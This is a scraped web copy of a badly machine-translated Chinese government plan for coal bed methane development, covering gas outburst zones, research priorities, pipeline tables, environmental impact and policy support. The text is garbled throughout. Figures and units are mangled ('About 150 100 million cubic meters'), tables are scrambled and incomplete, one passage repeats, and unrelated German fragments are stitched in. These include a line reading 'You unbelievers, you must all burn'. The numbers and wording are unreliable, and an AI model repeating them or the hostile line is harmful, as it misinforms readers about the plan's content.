Kubikmeßinstrumente jährlich liefern kann.

2006年9月18日星期一 Strategic planning positions.

CBM (coal bed methane) development and use of the "11th Five-Year" plan (2)

-------------------------------------------------------------------------------- June 28, 2006 the number of news sources. the State Development and Reform Commission website read. 411 Acquiescence fonts 9pt 10pt 11pt 12pt 13pt 14pt 15pt 16pt 17pt 18pt 20pt 25pt

Fourth, comprehensive management of coal and gas outburst

National geological map based gas and related information, subject to tectonic compression and shear strong, III, IV, V, tectonic development of coal generally, the total thickness of coal seam thickness, or more than half of layered development outburst tectonic units designated as a serious coal and gas outburst zone. If Xing Gong, and other coalfield Dengfeng ( Mine ) Prominent seam ( Table 4-4). In addition to the coalfield ( Mine ) Prominent seam, designated as a coal and gas outburst area. If Yangquan, the Jincheng Coal etc. ( Mine )( Table 4-5) 。

Table 4-4 Highlighted serious coal mine gas

Regional focus With the average gas

Volume (M 3 Per ton) Structure is complicated

Degree Construction of Coal Development

Of Seam or a single seam mining

1 Coal seam zone outstanding consolidated Ying 8.0 More Extremely complicated General development Mainly single seam

2 Dengfeng Coal Seam prominent area 8.0 More Extremely complicated General development Mainly single seam

3 New Discovery of prominent seam zone 8.0 More Extremely complicated General development Mainly single seam

4 Coal seam zone outstanding Shao Lian 11.0 More Extremely complicated General development Seam

5 Baisha Coal mine prominent area 10.0 More Extremely complicated General development Seam

6 Umeda prominent coal mine area 10.0 More Extremely complicated General development Seam

7 Nantong prominent seam zone 10.0 More Extremely complicated General development Seam

8 Tianfu prominent coal mine area 10.0 More Extremely complicated General development Seam

9 Zhongliangshan mine prominent seam zone 10.0 More Extremely complicated General development Seam

10 Songzao Coal mine prominent area 10.0 More Extremely complicated General development Seam

11 Coal mine prominent Furong District 10.0 More Extremely complicated General development Seam

12 Gill prominent coal mine area 10.0 More Extremely complicated General development Seam

13 Kong Ling prominent British coal mine area 10.0 More Extremely complicated General development Seam

14 Fengcheng coal mine prominent area 10.0 More Extremely complicated General development Seam

15 Jiangxi coal mine prominent area 10.0 More Extremely complicated General development Seam

16 Six prominent coal mine area 13.0 More Extremely complicated General development Seam

17 Coal mine in Shuicheng prominent area 12.0 More Extremely complicated General development Seam

18 District prominent organizations gold seam zone 13.0 More Extremely complicated General development Seam

19 Tongzi prominent coal mine area 10.0 More Extremely complicated General development Seam

20 Expansion prominent coal mine area 10.0 More Extremely complicated General development Seam

21 Coal mine prominent area 10.0 More Extremely complicated General development Seam

22 Jiaozuo Coal mine prominent area 10.0 More Extremely complicated Development Mainly single seam

23 Su County District outburst coal mine in eastern 10.0 More Extremely complicated General development Seam

24 Coal mine votes prominent North District 10.0 More Extremely complicated General development Seam

Table 4-5 Mine coal and gas outburst

Regional focus The average gas content (M3/t etc.) Structure is complicated

Miscellaneous degree Coal Construction

Education situation Seam or single

1 Yangquan Coal mine prominent area 10.0 More More complicated More development Seam

2 Rood prominent seam zone 10.0 More General General Mainly single seam

3 The outburst Qinshui Coalfield 10.0 More General General Mainly single seam

4 Su County coal mine prominent western region 10.0 More Complicated Development Seam

5 Linhuan prominent coal mine area 10.0 More Complicated Development Seam

6 Pingdingshan coal mine prominent area 10.0 More Complicated Development Seam

7 Anyang - prominent Hebi Coal mine area 9.0 More Complicated Development Mainly single seam

8 Minesoils prominent seam zone 9.0 More Complicated Development Seam

9 Fengfeng Mining Area prominent seam zone 9.0 More Complicated Development Mainly single seam

10 Prominent coal mine in Handan area 9.0 More Complicated Development Mainly single seam

11 Xiahuayuan prominent coal mine area 8.0 More Complicated Development Seam

12 Chengde coal mine prominent area 8.0 More Complicated Development Seam

13 Baotou mine prominent seam zone 8.0 More Complicated Development Seam

14 Coal mine prominent seam zone 11.0 More Complicated More development Mainly single seam

15 Tongchuan - Jiaoping kerosene gas symbiotic District 8.0 More More complicated General Seam

16 District kerosene gas symbiotic Binchang Mining Area 8.0 More More complicated General Seam

17 Symbiosis District kerosene Huangling coal mine gas 8.0 More More complicated General Seam

18 Shitanjing prominent coal mine area 8.0 More More complicated More development Mainly single seam

19 Shizuishan prominent coal mine area 8.0 More More complicated More development Mainly single seam

20 Prominent coal mine in Wuhai District 9.0 More More complicated More development Seam

21 Coal mine prominent table Hill District 9.0 More More complicated More development Seam

22 Prominent coal mine in Jingyuan area 9.0 More More complicated More development Seam

23 Tonghua Coal mine prominent area 9.0 More Complicated Development Mainly single seam

24 Yang coal mine prominent red zone 9.0 More Complicated Development Mainly single seam

25 Fuxin Coal Mining Area prominent area 9.0 More Complicated Development Seam

26 Fushun coal mine prominent area 9.0 More Complicated Development Seam

27 Jixi coal mine prominent area 9.0 More Complicated Development Seam

28 Hegang mine prominent seam zone 8.0 More Complicated Development Seam

29 Qitaihe coal mine prominent area 9.0 More Complicated Development Seam

30 Tracking the outburst coal mine area 9.0 More Complicated Development Seam

31 Panjiang Coal mine prominent area 10.0 More Complicated Development Seam

32 Panzhihua prominent coal mine area 9.0 More Complicated Development Seam

33 Hung-mao prominent coal mine area 9.0 More Complicated Development Seam

34 Prominent seam coal mine area 10.0 More Complicated Development Seam

Serious prominent local coal and gas production and the construction of the mine, it is necessary to establish and improve the gas extraction system, the ground coalbed methane gas extraction and underground extraction combination, in accordance with the "rules of coal and gas outburst," Preventing measures to seam gas pressure dropped 0.74 MPa below the coal seam to achieve targets without danger, before production.

Coal and gas outburst in the area of production and the construction of mine, it is necessary to establish and improve the gas extraction system, the ground coalbed methane extraction and downhole gas extraction combined to take reasonable measures to prevent sudden, prominent seam gas extraction rate and various economic indicators with the "prevention of coal and gas outburst rules," the seam without danger, before production.

Strictly implement the "industrial restructuring Catalog," in coal and gas outburst in the region, no new small coal mines that do not meet the requirements of the existing small coal mines to be sorted out is backed gas management experience, technology, infrastructure and management of large coal enterprises, the implementation of integration and transformation of the joint commission or its management, improve mine resilience.

5, accelerating independent innovation

( 1 ) Strengthen basic theoretical research and technological breakthroughs

1 And developing coalbed methane concentration of hypertonic hypertonic enrichment theory and prediction technology research. Coal is the main content of organic matter. the history and evolution of coalbed methane formation mechanism. Coal seam reservoir and the reservoir characteristics and the mechanism of evolution. CBM preserve the history and preservation conditions. Coalbed Methane and enrichment mechanism. Coal Bed Gas Enrichment. CBM hypertonic enrichment theoretical prediction and forecasting technologies.

2 And the determination of basic parameters of the gas flow occurrence principles and methods. Coal is the main contents. original gas pressure, gas content and permeability, joint development, coal moisture content, migration of groundwater extraction of gas, coal intensity of the impact of drilling parameters for the determination of methods, techniques and equipment for comparative analysis.

3 And research projects on the basis of the gas disaster. Main contents are. Coal major disasters caused by the mechanism of evolution and dynamics. Temporal and spatial evolution of mining-induced fractures coupled with the effects of the gas flow, the gas dynamic evolution of disaster response mechanisms and geophysical law, and the dynamic evolution of gas and coal dust explosion prevention mechanism.

4 And developing gas first, after mining theory and supporting technical studies. Main contents are. the exploitation of coal resources and coal-bed methane resources in time and space allocation; Underground coalbed methane development and extraction of ground interaction; Underground coalbed methane development and extraction of the ground supporting technology; First gas production, mining, after the best mode; Coal and gas mining technologies, including low permeability coal mining coal extraction mobile relieving gas technology, strengthen the original seam gas extraction technology, gob gas extraction technology.

5 And developing gas drilling, coalbed methane production technology and production technology research. Underground main contents are. Large-diameter drilling machine running track and directional drilling technology; Construction and development of soft rock, soft seam roof and the extraction of gas drilling rigs and retaining hole; Horizontal CBM production mechanism and mathematical model; CBM horizontal well drilling geological process-oriented R & D and technology equipment; CBM multi-lateral horizontal well drilling technology; Horizontal CBM production technologies.

6. The gas disaster warning and control technology research. Main contents are. coal and gas outburst, the main gas explosion in the gas disaster warning systems and intelligent technology; Gas Research forecasts new technology and equipment ; Mine rapid transmission of broadband high reliability integrated monitoring key technologies and equipment research ; Gas Disaster Prevention Technology and Equipment ; Research on mine emergency rescue techniques and equipment.

7. Gas use of technology and equipment research and development. CBM main contents are. efficient storage, the major gas liquefaction temperature low voltage, high efficiency ANG Technology, methane hydrate storage and transportation technology; Thermoelectric cooling and for mine cooling technology, the major gas for thermoelectric cooling equipment used for power generation and associated technologies; Low concentration gas and coal combustion for power generation technologies; Low concentration gas transmission and the use of security technology and equipment research and development; Wind mine gas emission industrial boiler combustion technology; Ghulam coalbed methane industry is a purely technical and research.

( 2. ) Widespread application of the technology and equipment

1. Ground extraction. Son. multi-lateral horizontal well drilling technology, underbalanced drilling technology, the ground fracturing vertical wells increased permeability of coal permeability and expand the area of high technology, drainage extraction technology, the coalbed methane well fracturing monitoring technology, CBM logging technology, CBM rope core technologies.

2. Underground extraction. With the original coal seam are. Drilling long, deep hole presplit blasting increase seam permeability control technology, pre-selected CROSSCUTTING coal seam gas technology, and high-power mobile hydraulic pump rigs; Depressurized area gas extraction mining technology, mining Regional Governance protective layer of gas; Goaf extraction technology, the level of long-rock drilling technology.

3 And natural gas use. Gas. Gas main civilian technology and apparatus; Low voltage supply hot water and steam gas boiler technology and equipment; Gas generation technology and equipment, such as generators.

6 CBM long pipeline network construction

Manpower planning CBM pipeline and a gas pipeline network. "11th Five-year Plan" period, the planning and construction of the main gas pipeline CBM 10 Of the total length of lines 1441 Km, the total capacity of gas 65 Billion cubic meters ( Table 4-6) 。

Table 4-6 Planning long-distance pipeline construction

No. Pipeline planning ( Starting - End ) Diameter (Mm) Length (Km) Pressure (MP) Gas capacity ( Billion M 3 ) Investment ( Billion ) Construction time

2 Duanshi - Jincheng - Love -( Then in North Extension ) 426 120 6 10 2.88 2006.

3 Duanshi - Changzhi - Linzhou - Anyang - Handan 426 245 6 10 5.88 *

4 Planners - Chongqing 400 175 1.47 2.3 2.1 2006.

6 Daning - Jixian - Linfen - Huozhou 325 240 4 5 5.28 *

7 Ningwu - Yuan-ping - Dayu - Taiyuan - Shouyang - Yangquan 325 300 4 5 6.6 *

8 Three exchanges - Shaanxi-Beijing 2 Line 219 70 11 5 1.4 2007.

9 Duanshi - I Bajia ( Then Pipeline ) 426 40 15 10 0.96 2008.

10 Bada - Shaanxi-Beijing Line 325 20 7 5 0.44 2008.

* As further proof. the use of coalbed methane development

Chapter V Environmental Impact Analysis and Countermeasures

First, the impact on the environment

( 1 ) Extraction ground

Coalbed methane wells, gathering and transportation hubs, such as construction, pollution comes mainly from noise, dust, sewage and solid waste to the surrounding environment. Construction vehicles, machinery and personnel activities on the surrounding noise impact will be temporary, would disappear once construction is finished. Site and trench excavation, construction machinery and vehicles, and personnel activities will cause damage to vegetation and soil disturbance. Sewage and wastewater project will have a definite impact on the surrounding environment. Produce small quantities of solid waste, proper treatment, not on soil, vegetation and other environmental factors have a devastating impact. Construction resumed promptly after the end of vegetation.

Coalbed methane extraction, mainly from air pollution emissions from the gas station, pigging operations and emptying the combustion flue gas, the main pollutants are carbon dioxide; Station water pollutant emissions from the small wastewater and domestic sewage. CBM pilot wells are under production output of the wastewater laboratory data COD42.34 Mg / Or, suspensions 30 Mg / Or sulphide 0.10 Mg / Or, PH Radio 8.64. Ammonia 1.419 Mg / Or, wastewater concentrations were below targets GB8978-1996 "Wastewater discharge standards". The main pollutant wastewater NH3 — N And bacteria. Station will operate some equipment vibration and noise.

( 2. ) Underground extraction

CBM ( Coalmine ) Underground extraction devices, ground CBM ( Coalmine ) Processing station and the construction of supporting facilities such as storage during construction will have a certain amount of dust, sewage, noise and solid wastes, but also will have an impact on the ecological environment.

CBM coal mine ( Coalmine ) Underground coal extraction will greatly reduce the methane content of gas to reduce accidents, improve production safety in coal mines, and help protect the lives and safety of miners. But Transportation CBM gathering ground station and the station the same, but there are some impacts on the environment.

CBM ( Coalmine ) Pipeline construction of the ecological environment is the most important environmental impact. These include noise, sewage, dust and solid waste on soil, vegetation, wildlife and ecological system disruption. Pipeline completed, the pipeline, gas stations along the sensitive areas along the goal will be that there are some potential safety problems and environmental risks.

Each of the coal mining and coalbed methane emissions to the atmosphere ( Primarily containing methane ) About 150 100 million cubic meters of CBM ( Coalmine ) Use will significantly reduce methane and other greenhouse gas emissions, improving the atmospheric environment.

CBM ( Coalmine ) Although the combustion process will have to use a certain amount of NO X. A small SO 2 Dust and trace, but substitute coalbed methane can greatly reduce the use of coal combustion emissions of atmospheric pollutants, coal can be saved annually 2000 10,000 tons of sulfur dioxide emission reductions 75.6 10,000 tons ( About the current total emissions 3%) Emissions reduction 186 Million tons, while also reducing the ash covering the environmental issues, so as to avoid a coal processing, transportation, caused by dust and other air pollution, the atmosphere is conducive to the improvement of the environment.

Second, environmental protection measures

( 1 ) Environmental Protection

1 And CBM ( Coalmine ) Enterprise development specialists, responsible for monitoring environmental indicators to monitor the implementation of environmental protection measures, and coordinate the resolution of the problem. Meanwhile, the environmental education of workers, workers regulating behavior.

2 And the planning and construction of the project according to the environmental impact assessment. Strictly enforce the "three-in" system.

3 And improving pipeline welding quality and reduce leakage. Pigging operation of the coalbed methane emissions and stop anomalies to be used after flaring emissions.

4 And the election station lines in the election process must avoid drinking water sources. Yard of the production and livelihood through sewage to sewage treatment systems.

5 And use low-noise equipment necessary for acoustic noise reduction processing. Green station around to control noise and atmospheric absorption of harmful gases and particulate matter in the atmosphere block proliferation.

6. In the election market, the election stations, line selection process must avoid nature reserves, scenic spots and historical sites, forest, crop planting, is not the best farmland, to bypass waters and marshes. Have a rational plan for a link between road to the construction site, prohibiting arbitrary characteristics. Pipeline Construction, formed as soon as possible to restore the landscape.

( 2. ) Environmental Monitoring

1 And construction projects, the need for a systematic monitoring of the region's environmental quality for comparative analysis.

2 And should select a certain number of coalbed methane wells, monitoring of the drilling, fracturing and exclusive process of mining operations, such as wells and the surrounding ecological environment, acoustic environment, the impact of surface water and groundwater.

3. The valley sides pipeline deal 1 M. As well as the gathering point for the surrounding ecological environment monitoring; Compression stations, power stations, factories lay 1 Within the scope of the environmental impact km acoustic monitoring; Also both sides of the pipeline 40 M Compressed Air Station and the surrounding area 50 M The scope of environmental risk assessment.

4 And the exploitation of coalbed methane wells within the scope of the distribution network groundwater impact evaluation, and outfall upstream 100 M Downstream to the outfall 4 Km of the surface water impact evaluation.

Chapter VI Safeguards

First, to CBM ( Coalmine ) Development and use of monitoring

CBM building sound ( Coalmine ) Development and use of the regulatory system, specifically the various government departments for the supervision duties, and improve legislation and formulate relevant policies, strictly coalbed methane exploration and development of technological, capital, management expertise and personnel access, and strengthening of project approval, price, quality, safety, environmental protection, information, standards and the public interest, such as the macro-control and management. Uphold national unity planning, the overall development and steadily promoting the development and utilization of coalbed methane, to avoid projects begin to prevent the waste of resources and funds.

Second, the coalbed methane industry categories, advance step by step

Increased coal-bed methane exploration and development work, and carry out comprehensive evaluation forecast coalbed methane resources. The extraction conditions with the ground, as soon as possible "first gas production, coal mining after the" priority of coal and gas outburst in the regional, regional and development conditions in coal mine production safety successor good ground coalbed gas-rich region extraction. Develop coalbed methane gas content security control standards to improve the pumping plans are worked out, plans are worked out to the wind as the main content management industry standards for coal bed methane gas production and mining integration of specific provisions. Priority support 45 Monitor key enterprises and gas extraction system; Gas extraction rate below key support 40% Mine transformation of the extraction system; Appropriate support new or modified coal extraction system to ensure production safety in coal mines and promote the healthy development of coalbed methane industry.

Third, sound CBM ( Coalmine ) Support industrial development policy

CBM development, and to promote the use of coal bed methane extraction, and actively seek work out relevant policies.

The development of coalbed methane gas and coal extraction projects, land use, in accordance with relevant state regulations priority;

On the ground directly involved in CBM ( Coalmine ) Prospecting and mining enterprises. 2020 Years ago, according to the relevant state regulations apply for a waiver for the use of prospecting and mining rights of toll charges;

On CBM ( Coalmine ) Technological transformation projects extraction using imported equipment, instruments, accessories and tools, import tax policy;

CBM ( Coalmine ) Extraction equipment to be used in the base period based on accelerated depreciation, and depreciation costs were paid at the enterprise;

Use of coalbed methane extraction ( Coalmine ) The main raw materials for the production of products, 2020 Years ago VAT immediately;

Coal bed methane extraction and use of its main raw materials for the production of products derived from, the five-year income tax exemption from the annual profit. Allowing enterprises by the time the actual cost of technology development 150% Then offset taxable income;

The use of coal mine gas generating enterprises, the self; Need to be connected to the surplus electricity from the power grid enterprises priority to selling online, Internet access tariffs approved by the state electricity implementation or enforcement of the local thermal power lever desulfurization unit price.

Fourth, the creation of a sound system of technical support for coalbed methane industry

Gradually establish a sound enterprise as the mainstay and market as the orientation, the combination of production, learning, and research and development suited to China's CBM exploration, extraction system using the technology. States to strengthen its technology center, and adopted policies to encourage independent innovation incentive mechanism to promote enterprises to develop coalbed methane ( Coalmine ) Development and use of innovative technology, and tackled technical problems. Accelerate the construction of coal mine gas control and the National Engineering Research Center for CBM development and utilization of national engineering research centers, implementation and utilization of coal bed methane project management laboratory, to become independent and innovative networking and systems integration, technology and adhere to self-development phase, strengthened the digestion and absorption of imported technology and innovations.

Fifth, deepening reform of institutions and mechanisms used for coalbed methane development

All resources and national reform and development of coalbed methane systems and mechanisms to attract investors to participate in CBM development and utilization, mobilize all human, financial and material resources to promote the development of coalbed methane industry. CBM development and utilization of the established mechanisms for coordinating interests and mobilize local enthusiasm. Encouraging large enterprises to participate in the exploration, development and utilization of coalbed methane. Appropriate mechanisms for the introduction of competition, and encourage foreign companies to invest in coalbed methane resources in the risk exploration and coal bed methane extraction and utilization CBM technical cooperation and infrastructure construction projects. Develop cooperation with foreign regulatory measures, and improve and strictly implement the withdrawal mechanism, the implementation of the timely termination of the contract of inadequate investment.

6, the creation of coalbed methane development and use of training bases and academic exchanges

Encourage universities and national research base, in connection with the state and employers together for the mechanism, set up a high-level R & D personnel training, continuing education and academic exchange base for the development of coalbed methane industry to provide personnel support.

7, overall planning of natural gas and coalbed methane ( Coalmine ) Network construction

And the distribution of resources according to market demand, overall planning and coalbed methane gas pipeline network, and taking into consideration the requirements of both resources and future transportation needs of regional resource output. CBM quality standards for the state to encourage coalbed methane gas pipeline network access and expand the scope of coalbed methane consumption. According to the nearest gas Transportation to use more than the principle of combining support local enterprises and CBM dedicated network construction.

8, and promoting coordinated development of coalbed methane and coal resources

Adhere to the integration of coal gas, coal and coalbed methane clearing up and properly resolve the problem of mining rights. Where new mineral, coal, coalbed methane resource exploration, evaluation and reserves identified. Where have gas content exceed state standards and the development of the ground conditions, we must unify preparation of the coal and coalbed methane development, CBM extraction preference ground, promote coordinated development of coalbed methane and coal resources.

Explanation of Terms

CBM. There to give seam methane as the main component, mainly with adsorbed on the surface of coal matrix, and some drifted away from the pores of coal seam or dissolved in water hydrocarbon gases.

Coalmine. From the underground coal, the outflow of the rock mass, mainly to the harmful methane gas skies. Coalmine more complicated elements, in addition to methane ( % 80

90%). It also contains heavy hydrocarbons ( Ethane, propane ). Carbon dioxide, nitrogen gas and some rare individual mine also contain hydrogen, carbon monoxide or hydrogen sulfide.

CBM recoverable resources. The estimate has been proven in a specific time ( Recovery has been included ) And yet proven, in the foreseeable future economic conditions can be taken out of the total coal-bed methane resource. CBM resources, including coal mining and resource extraction exertion remaining recoverable resources.

CBM proven reserves. Identify the geological characteristics of coalbed methane reservoir, reservoir and gas distribution laws and the mining conditions ( Including the reservoir, pressure and gas flow capacity ) ; Slim and through the net / Or single well test confirmed the network exploration or development wells within the scope of coalbed methane resources and be admissible. CBM resources, a high degree of reliability, the reliability coefficient of reserves 0.7

Seam gas. Generally refers to the presence of coal seam methane gas properties, often containing gas, methane concentration and resource abundance and gas saturation four basic elements to be evaluated, it is the primary basis for evaluation of coalbed methane resources.

Coalbed gas content. Under the conditions of the coalbed methane content in coal strata in the aggregate, including dispersion capacity ( Samples can be placed before the release of the gas desorption mass ) And desorption ( Desorption samples from the tank to release the gas volume ) And residual ( Desorption termination of the residual gas in coal volume ) 。

Reservoir pressure. Porosity is the role of coal - The fluid pressure within the fractured space, it is also known as the pore fluid pressure.

Permeability. Fracture system in a certain pressure difference, permitting fluid ( Water, gas, oil ) By the nature of the size of penetration with penetration said. Coal permeability of coal-bed methane exploration and development projects affecting the success or failure of one of the largest reservoir parameters.

Milli dc. Common units permeability, symbols MD 。 1mD=0.987 X 10 -3 Μ M 2 ( Square microns ) 。

CBM resources in abundance. For specific geological unit, the unit area of coalbed methane resources in the geological units generally use 10 8 M 3 /km 2 。

Gas Basin ( Group ) : CBM basin containing ( Group ) The short is the second unit CBM division. Basin coalbed methane gas formation and occurrence of the basic geological units, including the obvious prototype basin and the border is not easy to determine the residual basin boundary ( Group ). Which refers to the prototype basin formed in a stable tectonic environment, the long-term sustainability and sank less later reworking of the basin; Residual basin group that formed early in the geologic history of severe erosion later, deformation and overlay, transformation of the role of such deep basin ( Group ) 。

CBM (coal bed methane) development and use of the "11th Five-Year" plan (1) Office of the State Council on Accelerating the coalbed methane (coal gas) extraction using a number of views

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Major projects. the development of coalbed methane wells in Shanxi Qinshui Zaoyuan pilot projects, production test wells 15 Exports; Fuxin, Liaoning Province Liu wells for coalbed methane development project, drilling 8 I, the daily gas production of single well 3000 Cubic meters above; Shanxi Jincheng PANZHUANG CBM surface development projects, the construction 175 I coalbed methane wells, gas production about Japan 10 Million cubic meters; Panxie Qinnan River Pilot Project, the construction project 900 I coalbed methane wells, 2005 Drilling completed by the end of 100 I daily output of about gas 8 Million cubic meters.

Large-scale CBM surface development of domestic enterprises mainly in the International Coalbed Methane Corporation, the China National Petroleum coal-bed methane exploration and development company, Blue Flame CBM Jincheng Coal Group Company. Participate in the exploration and development of coalbed methane Gleick foreign companies, mainly in the United States, the Far East Energy Company

Ihr Ungläubigen Basher, Brenne müsst ihr alle

Hier die ganze länge 2006年9月18日星期一 Latest information on the current location.

CBM (coal bed methane) development and use of the "11th Five-Year" plan (1)

-------------------------------------------------------------------------------- June 28, 2006 the number of news sources. the State Development and Reform Commission website read. 119 Acquiescence fonts 9pt 10pt 11pt 12pt 13pt 14pt 15pt 16pt 17pt 18pt 20pt 25pt

CBM ( Coalmine ) An unconventional natural gas, energy and chemical raw materials quality.

States attach great importance to the development of coalbed methane and coal mine gas prevention and control work. CBM leading comrades of the State Council called for increasing scientific research, exploration and development efforts and the formulation of plans and measures. SCS 25 [2005]35 Document research, development and utilization of coalbed methane as compiled 2005 、 2006 One of the major tasks of Energy. In full investigation, draw extensively on the basis of various views and suggestions, the State Development and Reform Commission has completed the "CBM ( Coalmine ) Development and use of the "11th Five-Year" plan " ( Hereinafter referred to as the "Program" ) Preparation, and in accordance with the "People's Republic of the 10th Five-Year Plan for National Economic and Social Development Program," and the revision and perfection.

CBM geographical scope, including "planning" ( Coalmine ) Development and use of the provinces, autonomous regions and municipalities, including coalbed methane industry ( Coalmine ) The exploration and development of the ground, underground extraction, transportation and utilization. The deadline for planning 2006 - 2010. The benchmark for Planning 2005 2000.

CBM of "planning" ( Coalmine ) Status of the development of the situation, according to protect coal mine production safety, to build a resource-saving and environmentally friendly, and the general requirements of a socialist harmonious society, defined the guiding ideology, principles and objectives described in the next five years China's CBM ( Coalmine ) The blueprint for the development, distribution and development of the main tasks undertaken an environmental impact assessment of the security measures.

The next five years, China's CBM ( Coalmine ) Development must be guided by Deng Xiaoping Theory and the "Three Represents" important thought and the scientific concept of development, adhere to the principle of "safety and prevention first, and comprehensive management" and firmly establish the protection of life, resource conservation, environmental protection concepts, relying on the market to guide, policy-driven, independent innovation, gas extraction and utilization to accelerate the development of coalbed methane industry. guarantee production safety and increase the supply of clean energy and reduce environmental pollution and promote sustainable development of coal industry.

My guidance is "planning" CBM ( Coalmine ) Development and guide the allocation of resources, decision-making arrangements for major projects and the important basis for government investment.

Chapter 1 Utilization

( 1 ) Resource distribution

China's coalbed methane resources. According to coalbed methane resource evaluation, our depth 2000m CBM resources around the shallow geological 36 Trillion cubic meters, mainly in the northern and northwestern regions. Among them, North China, Northwest China and the south and northeast regions of the occurrence of methane gas resources respectively accounting for the amount of methane gas 56.3% 、 28.1% 、 14.3% 、 1.3% 。 1000m Shallow, 1000

2000m The amount of methane gas, respectively accounting for the total number of coalbed methane resources geological 38.8% 、 28.8% And 32.4%. National outweigh 5000 Billion cubic meters of coalbed methane basins containing ( Group ) There 14. In which gas content 5000

10000 Chuannan billion cubic meters between the northern Guizhou Province, and the Sichuan - Chongqing, three ponds to lakes, such as milk basin gas content than 10000 Billion cubic meters of the east margin of the Ordos Basin, the Qinshui Basin, Junggar Basin and the eastern Yunnan-western Guizhou basin group, Erlian Basin and the Turpan - Hami Basin, Tarim Basin, Tianshan Basins, Hailar Basin.

About the total recoverable coalbed methane resources in China 10 Trillion cubic meters, of which more than 1000 Billion cubic meters of basin ( Group ) There 15 Five. The company, and the eastern edge of Ordos Basin, the eastern Yunnan-western Guizhou, Qinshui, Junggar, Tarim, Tianshan, Hailar, Tuha and Middle northern Guizhou, Sichuan, three Pool Lake Province, and Ningwu other. Erlian Basin coalbed methane resources can be tapped up to about 2 Trillion cubic meters; Eastern Ordos Basin, the recoverable resources in the Qinshui Basin 1 More than one trillion cubic meters, about recoverable resources in Junggar Basin 8000 Billion cubic meters.

China's coal geological structure is complicated, part of the transformation of coal basin in the latter part of a strong, diverse tectonic patterns, the occurrence coal and coalbed methane resources in the Ordos basin, and other large and mid-sized relatively simple, small and medium-sized basin more complicated.

Northeast given coal. On the part of a larger complex stratigraphic thickness of about 26000 coalbed methane or better conditions will be conducive to the development of coalbed methane. North China coal conferred. Luliangshan west of the eastern edge of Ordos Basin between Shanxi and the Taihang Mountains and Long Luliangshan ( Including the Qinshui Basin ). The tectonic conditions are conducive to the development of coalbed methane; Taihang Mountains in North China basin east of coal-bed methane development difficulties. Northwest given coal. Blocks northwest Tarim, Junggar Basin and Yili, better conditions for coalbed methane development. South China Coal Fu. Conditions for the development of coalbed methane resources more complicated. Yunnan-Tibet give coal. CBM preserve the structure of poor conditions.

2. Containing gas

Most of China's coal seam gas content. According to the National 105 Collieries district survey, the average gas content 10 Cubic meters / Tons of mine 43. Accounting 41% ; Average volume 8

10 Cubic meters / Tons of mine 29. Accounting 28% ; Average volume 6

8 Cubic meters / Tons of mine 19. Accounting 18% ; Average volume 4

6 Cubic meters / Tons of mine 14. Accounting 13% 。

3. Reservoir pressure

China's main coal reservoirs to undercompaction, some higher coal reservoir pressure, reservoir pressure gradient to a minimum 2.24 KPa / M up to a maximum of 17.28 KPa / M.

4. Seam permeability

China's coal penetration is lower, on average 0.002

16.17 Darcy cents. With a penetration rate of less than 0.10 Darcy's accounting cents 35% ; 0.1

1.0 Darcy's accounting cents 37% ; Than 1.0 Darcy's accounting cents 28% ; Than 10 Darcy cents less.

5 And poly unsaturated zone size

China's coalbed methane gas accumulated with great size, small to dozens of square kilometers, 10,000 square kilometers of resource abundance of 0.15

7.22 Billion cubic meters / Square kilometers.

Second, resources prospecting

After the founding of New China, and the state has invested in the nation's coal fields in the survey, the key areas for detailed investigation and accurate investigation. Meanwhile, the coal gas content was measured, the veins of coal gas enrichment, content and distribution for future coalbed methane resource evaluation, exploration and development laid the foundation.

Last century 90 Since the 1990s, coal-bed methane exploration and gradually entered the stage of industrialization, has in Shanxi Qinshui basin, the Hedong coalfield, Anhui Huainan and Huaibei Coal, Fuxin, Liaoning Province, iron, Fushun and Shenyang North area, Hebei Kailuan, big, peak area, Shaanxi Province area, Henan Anyang, Jiaozuo, Pingdingshan, Ying consolidate coalfield, Jiangxi Fengcheng area, Hunan Province of China Shao, Pak Sha area, Turpan - Hami Basin in Xinjiang and other regions, and coal-bed methane exploration and the development and testing work.

Currently, the state found proven reserves of about CBM 1000 Billion cubic meters of recoverable reserves of coalbed methane 470 Billion cubic meters, mainly concentrated in the southern Qinshui Basin, the iron and Yangquan mine.

Third, resource development

( 1 ) Ground Development

CBM surface development started in the last century 70 The end of the 1920s, the original Fushun Coal Science Research Institute in Fushun, Yangquan, Jiaozuo, Baisha, such as Baotou mine, mine gas outburst to address the main purpose of the construction 20 Ms ground export gas pumping test wells. However, due to technology, equipment and other conditions, the tests did not achieve the desired results.

Last century 90 's, Coalbed methane exploitation upsurge in different areas of coalbed methane development and testing. After more than ten years of development, achieved a major breakthrough. According to statistics, 2005 End of the year, a total construction pilot test wells 8. All coalbed methane wells 615 I, multi-branch horizontal wells 7 Mouth. 2005. Coalbed methane extraction insufficient ground 1 Billion cubic meters.

Major projects. the development of coalbed methane wells in Shanxi Qinshui Zaoyuan pilot projects, production test wells 15 Exports; Fuxin, Liaoning Province Liu wells for coalbed methane development project, drilling 8 I, the daily gas production of single well 3000 Cubic meters above; Shanxi Jincheng PANZHUANG CBM surface development projects, the construction 175 I coalbed methane wells, gas production about Japan 10 Million cubic meters; Panxie Qinnan River Pilot Project, the construction project 900 I coalbed methane wells, 2005 Drilling completed by the end of 100 I daily output of about gas 8 Million cubic meters.

Large-scale CBM surface development of domestic enterprises mainly in the International Coalbed Methane Corporation, the China National Petroleum coal-bed methane exploration and development company, Blue Flame CBM Jincheng Coal Group Company. Participate in the exploration and development of coalbed methane Gleick foreign companies, mainly in the United States, the Far East Energy Company.

( 2. ) Underground extraction

Coal Mine gas extraction began in the last century 50 Early 1990s. After 50 years of development, coal mine gas extraction from initial production safety in coal mines to ensure safety for the comprehensive development of green energy-extraction; Early extraction technology for the high-permeability of the coal seam extraction and gob single extraction technology to the progressive development of different types of conditions suitable mining method in the integrated gas extraction technology.

According to statistics, last year, the national high gas coal mine 4462. Coal and gas outburst 911 Department. In 615 For key state-owned coal mine, coal and gas outburst near 200 On the high-gas coal mine 152 Yes, ground equipment fixed gas extraction system 308 Presentation. 2005. The nation's underground coal bed methane extraction near 23 Billion cubic meters, Yangquan, Jincheng, Huainan, planners, Pan Jiang, Shuicheng, Fushun 7 Extraction over mines, 1 Billion cubic meters.

4 CBM ( Coalmine ) Use

China's coalbed methane ( Coalmine ) Use has been slow. 2005. The country about the use of 10 Billion cubic meters. Mine gas extraction using mainly concentrated in the high-owned mine. Drilling ground extraction using mainly concentrated in Shanxi Qinshui Zaoyuan Well, Fuxin, Liaoning Province Liu Well, Panzhuang Jincheng, Shanxi Qin Panxie River Project, to take possession of the Department of Transport vehicle sales for the surrounding regions.

